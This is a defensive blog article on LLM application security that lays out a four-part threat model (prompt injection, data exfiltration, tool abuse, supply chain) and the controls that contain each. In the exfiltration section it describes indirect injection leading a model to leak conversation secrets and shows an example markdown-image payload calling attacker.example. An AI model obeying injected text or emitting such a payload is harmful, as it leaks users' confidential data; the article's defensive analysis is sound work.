Skip to content
PAVEL GLUKHIKH
Menu

AI

LLM security: threats and defensive architecture

A practical LLM security threat model — prompt injection, data exfiltration, tool abuse, supply chain — and the defensive architecture that contains them.

6 min read

Executive summary

LLM security is the practice of containing what an attacker can achieve through a language model application, because you cannot reliably prevent the model itself from being manipulated. The workable threat model has four pillars: prompt injection through any text the model reads, data exfiltration through any channel the model can write to, abuse of tools the model can invoke, and compromise of the model supply chain. This article maps each pillar to the OWASP Top 10 for LLM Applications and lays out the defensive architecture: trust-boundary design, least-privilege tool scopes, output mediation, and egress control. The organizing principle throughout is blast-radius reduction, not model alignment.

The uncomfortable truth about LLM security is that the component at the center of your application follows instructions found in data, and no amount of prompt engineering changes that reliably. A language model cannot cryptographically distinguish the developer’s instructions from instructions an attacker hid in paragraph six of a retrieved PDF. It reads text. It acts on text. That is the product.

Everything downstream of that fact is architecture.

So the discipline ends up looking less like hardening the model and more like security engineering we have done for decades: define trust boundaries, assume the component inside them can be subverted, and make subversion unprofitable. The reasoning that says a compromised workstation should never reach the database says a compromised context window should not reach one either. New principal, old playbook.

The threat model in four pillars

The OWASP Top 10 for LLM Applications is the standard catalog, and it is good. Use it in reviews. For architecture work I collapse it into four pillars, because the defenses group naturally this way and ten categories is too many to hold in your head during a design session.

1. Prompt injection (OWASP LLM01)

Any text the model reads can carry instructions. That includes the user’s message, which is direct injection, and it includes everything the application fetched on the user’s behalf: documents, web pages, emails, database fields, tool outputs. That second category, indirect injection, is the one that should keep architects up at night. RAG systems ingest untrusted content as a feature, and the victim is a user who asked an innocent question over a poisoned corpus.

Assume some injections succeed. Then ask the only design question that matters: what can a successful injection actually do? If the answer is “reword a summary,” you have a quality problem. If the answer is “call the refund API,” you built that vulnerability yourself, and no injection filter is coming to save you from it.

2. Data exfiltration (LLM02, LLM06 territory)

An injected model becomes an insider that will helpfully gather and leak whatever it can reach, through whatever channel it can write to. The classic pattern: injected instructions tell the model to summarize the conversation, secrets and retrieved confidential data included, into the URL parameter of a markdown image, ![x](https://attacker.example/?d=...), which the client dutifully renders. The data leaves in a GET request that looks like an image load.

Count the output channels and you have counted the exfil channels. Rendered markdown, tool arguments, emails the system can send, records it can write. Every one of them.

3. Tool abuse (LLM06/LLM08 — excessive agency)

The moment a model can invoke tools, injection converts to action. The threat scales with the union of everything the tools can do with the credentials they hold, not with what the feature was supposed to do. A “read my calendar” assistant whose service account can also send mail is, to an attacker, a phishing platform with excellent grammar.

4. Supply chain (LLM03, LLM05)

Model weights, fine-tuning data, embeddings, vector stores, inference servers, and the fast-moving Python stack underneath. All of it is supply chain. Poisoned and trojaned weights are documented in MITRE ATLAS case studies; more mundane and more likely are malicious packages in the ML toolchain and unsafe deserialization in older model formats. Self-hosting moves this entire pillar from your provider’s problem to yours, a trade some teams make deliberately and others discover retroactively.

Defensive architecture

No single control below is sufficient, and anyone selling you one control as sufficient is selling. The set, applied together, is the current defensible standard of care per OWASP and NCSC guidance.

Draw the trust boundary around the context window

Treat everything entering the model as untrusted: user input, retrieved chunks, tool results. Treat everything leaving it as untrusted output, as tainted as a form field in a web app. In practice:

  • Mark provenance on every context segment so downstream logic knows which content came from where, and use structured message roles rather than concatenating strings into one undifferentiated prompt.
  • Never execute, render, or forward model output without mediation appropriate to the sink. HTML-escape it, validate tool arguments against schemas, strip or proxy URLs.

We learned this lesson with SQL injection twenty years ago: the boundary between data and instructions has to be enforced by structure, not by hoping the data behaves. The industry is now relearning it with a component where the structure is probabilistic.

Least-privilege, per-request tool scopes

This is the highest-value control in the set. It is identity-first security applied to a new kind of principal, and none of the mechanics are new.

Tools execute with the end user’s effective permissions, never a standing service account. If the user cannot delete the record, the model acting on their behalf cannot either. Scope credentials per request, short-lived, narrowest possible: the ticket-summarizer gets read on that ticket, not read on the ticketing system.

Separate read tools from write tools, and put human-in-the-loop gates on irreversible or externally visible actions. One detail matters more than it looks: the approval screen must show the human the actual arguments, not a friendly paraphrase. A human who approves what the model says it will do, rather than what it is about to do, is part of the attack surface.

Control the egress channels

Exfiltration needs a writable channel. Enumerate them, then close them:

  • Disable or proxy remote image rendering in any UI that displays model output; allowlist outbound domains for any tool that fetches URLs.
  • Run inference and tool sandboxes in segmented network zones with explicit egress rules. A code-execution tool with open internet egress is an exfil primitive, full stop.
  • Log tool invocations and their arguments centrally. Injection that turns into action shows up here first, and at 2 AM this log is the difference between reconstructing an incident and narrating a guess.

Constrain the blast radius of retrieval

For RAG systems: enforce the caller’s document permissions in the retriever, treat corpus write-access as a security boundary, and record which chunks entered each answer so a poisoned source can be traced and purged. Whoever can plant a document in your corpus can inject at scale, which makes your wiki’s edit permissions part of your attack surface. Few teams have thought about that sentence, and it shows in reviews. The full design is in RAG architecture for the enterprise.

Secure the model supply chain

  • Pull weights only from verified publishers, verify checksums, and prefer safetensors over pickle-based formats.
  • Pin and scan the inference stack like any other production dependency. It is one, with a worse-than-average CVE cadence.
  • Version and access-control fine-tuning datasets. Training data is code now, and poisoning it is a persistent backdoor that survives every redeploy.

Detect, because prevention is probabilistic

Injection classifiers and heuristic filters in the gateway catch the casual attempts. Their more durable value is telemetry: they tell you who is probing, and how, before anything succeeds. Sampled production review, the same machinery as production evaluation, catches behavioral anomalies no signature ever will. Define in advance what constitutes an AI security incident and wire the thresholds into the same incident response process your infrastructure already uses. A new alert source, not a new discipline.

Tradeoffs, honestly

ControlCostVerdict
Per-request scoped credentialsReal integration work with your IdPDo it anyway; it is the control that caps everything else
HITL on writesLatency, reviewer fatigueOnly on irreversible actions; measure override rates
Egress allowlistingBreaks legitimate fetches occasionallyCheap insurance; exceptions via review
Injection filtersFalse positives, arms raceUseful telemetry; never the load-bearing control
Output sanitizationEngineering effort per sinkNon-negotiable for rendered or executed output

What to write down

For each LLM application, record four things: the trust boundary diagram, every content source entering the context and every sink receiving output; the tool manifest, with the exact scope each tool holds and why; the egress inventory for model-controlled channels; and the incident thresholds that trigger escalation. A reviewer holding those four artifacts can find your real exposure in an hour.

So can you. That is the point.

Security here is not about trusting the model less. It is about needing to trust it less, because the architecture never handed it more reach than the task required. That principle predates language models by decades, and it will outlast whatever replaces them.

Frequently asked questions

Can prompt injection be fully prevented?
No. There is currently no reliable way to guarantee a model will ignore instructions embedded in content it processes. Injection resistance keeps improving, but it is probabilistic, not absolute. Sound LLM security therefore assumes some injections succeed and designs so that a successful one finds nothing valuable to steal and no dangerous tool to trigger. Filters and detection reduce the frequency. Architecture caps the impact, and only architecture does.
What is indirect prompt injection?
Indirect injection is when the malicious instruction arrives in content the application fetches on the user's behalf: a retrieved document, a web page, an email, a tool result, rather than the user's own message. It is the more dangerous variant, because the victim did nothing wrong, and because retrieval-augmented systems ingest exactly this kind of untrusted content by design. The user asked an innocent question; the corpus answered with an attack.
Is the OWASP Top 10 for LLM Applications worth using?
Yes, as shared vocabulary and a review checklist. It names the failure classes, prompt injection, sensitive information disclosure, supply chain, excessive agency, and the rest, clearly enough to structure a threat-modeling session with people who have never done one. It is not a control framework; the architecture is still on you. I use it the way I use the classic OWASP Top 10: to make sure a review missed nothing obvious.
Do self-hosted models remove LLM security risks?
They remove one category and add another. You shed provider-side data handling concerns, and you pick up the model supply chain: weight provenance, inference-stack CVEs, GPU infrastructure hardening, all now yours. Injection, exfiltration, and tool abuse are completely unchanged, because they are properties of the application architecture, not of where the model happens to run. Where you host decides who holds which risks, not how many exist.

References

Related reading